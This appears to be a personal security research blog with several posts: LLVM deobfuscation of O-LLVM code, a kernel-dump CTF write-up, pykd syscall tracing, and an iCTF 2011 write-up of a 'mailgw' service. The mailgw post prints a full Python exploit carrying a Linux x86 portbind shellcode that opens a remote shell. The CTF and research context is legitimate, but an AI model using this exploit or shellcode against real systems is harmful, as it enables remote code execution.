Tuesday, March 24, 2015

Deobfuscation: Test O-LLVM protected code with simplification passes.

Roughly 5 years ago during researches in Taganrog Federal University we opened a discussion, what is the easiest way to protect program against heuristic analysis? The answer was easy, compile it with O0, O1, O2 and O3, and play with Ob and so on.

The best way to do it - is to take existing compiler and modify it. Flexible and good structured LLVM already started to be de facto standard for developing multi-platform compiler with new optimization features. So in that moment we wanted to use LLVM byte code optimization modules for code replication.

Our thoughts stayed thoughts, and I was pleasantly surprised when guys from Switzerland University presented o-llvm. Guys made a great job and currently they are supporting Instruction Substitution, Bogus control flow and Control Flow Flattering. Choice was not casual, and in this blog entry I'll discuss about simplification problem complexity and will show o-LLVM how we can use LLVM compiler for resolving some o- LLVM transformations.

Let's start with review articles related to functional equivalency.
First of all I want to point out [1], where S. Chow, V. Zakharov provided steps for Control flow flattering transformations and base on LBTM proved that minimization and redundancy resolving is PSPACE-hard. So, for example solving this problem can be equivalent mathematically to always complete Nintendo game (from here).

If we would talk only about resolving opaque predicates, or reformulate - determining execution branch statically, then it's a NP-hard problem. In [2] Chenxi Wang and others showed it base on 3-SAT problem and suggested 2 possible approximation methods: Brute-force search method (executing all blocks) and Alias-detection approximation methods (opaque predicates matching). Quarkslab team successful simplified transformation using miasm framework base on pattern matching for predicates and symbolic execution. Referenced attempt also complained that "there are always particular cases depending on the target binary" which, of course will make impossible automatic simplification system.

Briefly let's look thought complexity of other obfuscation techniques mentioned in obfuscation taxonomy. The easiest dead code elimination (DCE), as you might know, takes O(n^2), liveness analysis O(n^3)(DCE + O(|n|)), SAT predicates that could be solved with PPSZ O(2^{0.386n}), code duplication elimination is EXPTIME, restructured array can be assessed like SSA + sort = n^2*log(n).
I want to mention also Podlovchenko and his articles about using Algebraic models for program equivalency. Depending on the model belongs to transformation, complexity varies from logarithmic to NP.

I think now idea is clear. For a most transformation techniques simplification is possible. For a moment there are no universal methods of simplification, and only some experiments with it were made. In my blog entry I want to show how LLVM could help us with simplification.
Our steps are the following:
- compile code to LLVM-IR with o-LLVM obfuscation enabled(use omit-llvm flag)
- optimize obfuscated LLVM-IR with released LLVM version.
- generate graph for both IR

For experiments we will use code from Quarkslab experiments.

unsigned int target_function(unsigned int n)
  unsigned int mod = n % 4;
  unsigned int result = 0;

  if (mod == 0) result = (n | 0xBAAAD0BF) * (2 ^ n);

  else if (mod == 1) result = (n & 0xBAAAD0BF) * (3 + n);

  else if (mod == 2) result = (n ^ 0xBAAAD0BF) * (4 | n);

  else result = (n + 0xBAAAD0BF) * (5 & n);

  return result;

Here is LLVM-IR listing of function compiled with O0.

1. Let's start from Instruction Substitution, as from very basic technology.

As you can see, LLVM correctly resolved Substitution techniques for 3 branches. I assume that ideally, last branch should also be optimized. Running LLVM optimization to see the exact behavior I'll show in later posts.

2. The next transformation to analyze is Bogus CFG

LLVM removed 3 blocks, and optimized few of them. The third and last (TF) block from bottom looks weird and FALSE connecting to them. I think with a one more backward iteration LLVM could simplify those redundant FALSE brunches.

3. The last transformation I want to test is Flattering CFG

State machine created on flattering transformation was kept by LLVM. The only optimization was made is combining code from different states. Optimized 21 - 28 entries are the same, and I'm wondering why LLVM still kept them. If those blocks will be removed, code will be pretty the same with optimized Instruction Substitution.

LLVM has a good architecture and allows developer/researcher or malware writer to modify code in any direction he wants. For the people who want to get deep into o-LLVM I highly recommend to read Getting started with LLVM first.
Experiments showed us, that LLVM already can simplify some easy transformation and with modification for sure will be able to resolve complex stuff. But it's already cat and mouse game. The good feedback after my tests is that's already possible to create replication engine with LLVM - O-LLVM and mc-sema as a bin to LLVM translation engine.

In next blog posts I wanted to do some more experiments with [Obfuscation-] LLVM and mc-sema.

Monday, January 5, 2015

Using WPP to trace usermode apps

I've created sample app here to don't forget howto include WPP into system service. For more details in Russian blog post is on habrahabr. Read more...

Monday, July 22, 2013

UFOCTF WriteUP: Mmmm, Whiskey metal

My brother has taught me the Windows kernel programming, but I always asked him to help me with debugging. He was pissed off after a while. So he created kernel dump analysis task for me. I can't find answer. Please help me to find key and I will give you N points. I know that he modified my keylogger somehow, and I'm sure that driver already unloaded in virtual PC.

 P.S. I already get a few tips:
- key is SHA256 or decoded string
- My brother always make "Burp" and likes tea.

Here you can find a dump.

 Here is a short how to...

First you should find "Burp" log string in the memory dump. There is a two ways here. Using DebugView

Or just using search in WinDbg

Next start to analyze pool shown in log

Take a look inside.

Executable code found. Let's execute them. First we save memory.

To execute I will use Windbg. Load notepad in windbg, Readmem and set eip.

Here is a key:


Saturday, December 3, 2011

Write up Mailgw ICTF2011

It was best CTF, which I ever played. Thanks to organisers very much. I'm in TU Berlin write know and I played with ENOFLAG team.
In this topic I will describe mailgw service.

Lets analyse it with IDA. Analysis of server application should starts from accept function.
while ( 1 )
  v23 = 16;
  v24 = accept(v25, (struct sockaddr *)&v28, (socklen_t *)&v23);
  if ( v24 < 0 )
    v13 = __errno_location();
    v14 = strerror(*v13);
    fprintf(stderr, "ERROR: accept on socket failed: %s\n", v14);
    result = 1;
    goto LABEL_34;
  v19 = fork();
  if ( v19 < 0 )
    v15 = __errno_location();
    v16 = strerror(*v15);
    fprintf(stderr, "ERROR: fork failed: %s\n", v16);
    result = 1;
    goto LABEL_34;
  if ( !v19 )
dup2(v24, 0);
dup2(v24, 1);
result = manage_tcp_client();

As you can see. Child logic provides in manage_tcp_client function.
There is a switch with following values:
n - create account;
q - quit;
m - message;
r - read;
+ - create recipient;
- - create recipient;
l - list recipients;
s - send message.

Main attention attract the '+' block.
There is memory allocation and

mprotect((void *)(-v12 & (unsigned int)s2), ((unsigned int)&s2[v12 + 283] & -v12) - (_DWORD)addr, 7);

7 means EXEC+WRITE+READ. What I've done first, is patch this value to 3.
Next interesting place is filling protected buffer with code.

v15 = s2 + 260;
i = 0;
s2[260] = -52;
*(_DWORD *)&v15[i] = 0x82474FFu;
i += 4;
*(_DWORD *)&v15[i] = 0x82454FFu;
i += 4;
*(_DWORD *)&v15[i] = 0xC304C483u;
i = 0;
while ( 2 )
    if ( read(0, &ptr, 1u) )
      s2[i] = ptr;
      if ( ptr != 124 )
      s2[i] = 0;

This buffer can be dissembled.
push        dword ptr [esp+0x8]
call        dword ptr [esp+0x8]
add         esp, 0x4

As you can see from this peace of code, that the no limits for adding values in s2 buffer. And also there is a possibility to write over own code to s2+260. But first of all we need to find a place where this buffer called. Note, that buffer size if 284. Last values are list entry's. Also, note, that, for adding and deleting recipients, necessary to add + in the first place and | as last symbol.

Lets move to the '-' handler.

for ( s2 = *(char **)&recipients[276]; s2 != recipients; s2 = (char *)*((_DWORD *)s2 + 69) )
    if ( !strcmp(s1, s2) )
      ((void (__cdecl *)(_DWORD, char *))(s2 + 261))(*((_DWORD *)s2 + 64), s2);
      *(_DWORD *)(*((_DWORD *)s2 + 69) + 280) = *((_DWORD *)s2 + 70);
      *(_DWORD *)(*((_DWORD *)s2 + 70) + 276) = *((_DWORD *)s2 + 69);
      if ( debug )
        fprintf(stderr, "Recipient %s removed\n", s1);
      s2 = 0;

As you can see.There is a call s2 + 261 in '-' handler, is the recipients exist in list.
So. What's only needed is to put shellcode, as a recipent, to the buffer and then delete this reciepent. The one problem was to through away from strcmp function. For such purpose add 00 value as a first value.
Then put shellcode and at the offset 261 put relative jmp to 260 bytes back. "\xe9\xf7\xfe\xff\xff".
In my example I take Linux/x86 - forking portbind shellcode - port=0xb0ef(45295) - 200 bytes from Shell-Storm

import socket
import sys
HOST, PORT = "", 9119
shell = "\x00"
shell +="\x31\xc0\x31\xdb\x31\xc9\x51\xb1"
shell +="\x06\x51\xb1\x01\x51\xb1\x02\x51"
shell +="\x89\xe1\xb3\x01\xb0\x66\xcd\x80"
shell +="\x89\xc1\x31\xc0\x31\xdb\x50\x50"
shell +="\x50\x66\x68\xb0\xef\xb3\x02\x66"
shell +="\x53\x89\xe2\xb3\x10\x53\xb3\x02"
shell +="\x52\x51\x89\xca\x89\xe1\xb0\x66"
shell +="\xcd\x80\x31\xdb\x39\xc3\x74\x05"
shell +="\x31\xc0\x40\xcd\x80\x31\xc0\x50"
shell +="\x52\x89\xe1\xb3\x04\xb0\x66\xcd"
shell +="\x80\x89\xd7\x31\xc0\x31\xdb\x31"
shell +="\xc9\xb3\x11\xb1\x01\xb0\x30\xcd"
shell +="\x80\x31\xc0\x31\xdb\x50\x50\x57"
shell +="\x89\xe1\xb3\x05\xb0\x66\xcd\x80"
shell +="\x89\xc6\x31\xc0\x31\xdb\xb0\x02"
shell +="\xcd\x80\x39\xc3\x75\x40\x31\xc0"
shell +="\x89\xfb\xb0\x06\xcd\x80\x31\xc0"
shell +="\x31\xc9\x89\xf3\xb0\x3f\xcd\x80"
shell +="\x31\xc0\x41\xb0\x3f\xcd\x80\x31"
shell +="\xc0\x41\xb0\x3f\xcd\x80\x31\xc0"
shell +="\x50\x68\x2f\x2f\x73\x68\x68\x2f"
shell +="\x62\x69\x6e\x89\xe3\x8b\x54\x24"
shell +="\x08\x50\x53\x89\xe1\xb0\x0b\xcd"
shell +="\x80\x31\xc0\x40\xcd\x80\x31\xc0"
shell +="\x89\xf3\xb0\x06\xcd\x80\xeb\x99"
shell +="\x90" * (261 - len(shell))
print len(shell)
shell +="\xe9\xf7\xfe\xff\xff"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((HOST, PORT))
str1 = '+'+ shell + "|\n"
print str1
str2 = '-'+ shell + "|\n"


Wednesday, July 20, 2011


Ciss Hot Summer has a lot of different ways to do, but I choose bug hunting and trace building.
Some researches make trace with Temu, some use debuggers: MyNav, ProcessStalker. But, for kernel purpose, as you know, we need to use WinDbg. Big advantage that Windbg works everywhere.
It’s not a secret that kernel researches use Windbg for rootkit hunting and Analyzing. You can find a lot of scripts in KDAR project.
But It’s not comfortable to use Windbg script, so pykd project was born.
Today I would like to present you small overview of pykd and my own script for tracing syscalls.

Let’s start from installing. I can install only version for python 2.7. Another version didn’t work in my Win (It doesn’t work with any VCRedist).
If you installing it from setup packet you already have different examples. If you install only *.pyd file, download it, because documentation on his site is sparse. It’s time to make some experiments.
.load pykd.pyd - load extension in WinDbg.
!py name.py – starting script. Don’t forget to set PYTHONPATH because otherwise any dependencies will not work.
Have fun? …
As any debugger tracer, it’s necessary to insert breakpoints and handle them. Pykd has bp class. Handler must return DEBUG_STATUS_GO or DEBUG_STATUS_GO_HANDLER, to continue execution or stopping.

bp( nt.DbgPrint, Handler)
Then you should type go() in you script. Pykd set bp only after immediately start.
Next task is monitoring creating process and his child’s. You can find many different ways, but I’d like to control PspInsertProcess and PspProcessDelete. These functions append and remove EPROCESS to\from PsActiveProcessList. In my script I create a BPHandler class which contains handlers for Processes and Syscalls bps. Syscall bps enables when you process with started. For this purpose pykd has typeVar class.

eprocess = typedVar("nt", "_EPROCESS", reg(“eax”)
And you can use eprocess like a structure - eprocess.UniqueProcessId.
In Syscall handler we needs to get eprocess too. In this case I’d like to show you another command – dbgCommand

def GetCurrentProcess(self):
str = dbgCommand(".printf \"%x\n\", poi(poi(fs:[0x124])+0x50)")
return int(str, 16)
Starting script 
!py pykdtrace.py dropper
and any droppers in VMware and go to sleep.

Wake up and see big log file. Result of syscall I’m using for some metamorphic experiments, but it can be used for tracing drivers and so on. Change GetSyscallList function and get another Bp list for your purpose.

Looks pretty simple. But I have few remarks:

  • Pykd doesn’t show me python exceptions (print debug engine works fine. It’s makes me crazy)
  • Pykd doesn’t call destructor of any classes.( So It doesn’t deleted bp and doesn’t close file, when I stopping it by initial break.)
  • Pykd is slow engine for tracing purposes, But for rootkit hunting it’s really good things.

Another experiment with kernel tracing I will make with Ida and some IoCtl handler.

Good Luck.

P.S. I’m think that windows driver for temu is big. It’s my fault. You can see him for Win 7 from Linux driver developer in Olshanov repository.